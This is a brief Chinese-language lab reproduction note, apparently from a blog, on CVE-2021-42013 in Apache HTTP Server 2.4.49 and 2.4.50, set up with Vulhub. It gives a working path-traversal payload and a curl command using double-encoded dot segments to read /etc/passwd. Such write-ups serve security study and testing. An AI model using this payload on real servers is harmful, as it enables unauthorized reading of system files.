漏洞环境均基于Vulhub
原因
Apache HTTP 服务器项目致力于为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。
CVE-2021-42013 是由于CVE-2021-41773修复不完整而导致的漏洞,攻击者可以使用路径遍历攻击将 URL 映射到由 Alias-like 指令配置的目录之外的文件。
此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50,而不是更早的版本。
复现
Apache HTTP Server 2.4.50 修补了以前的 CVE-2021-41773 有效负载,例如http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,但它不完整。
用于.%%32%65绕过补丁(注意/icons/必须是现有目录):
curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd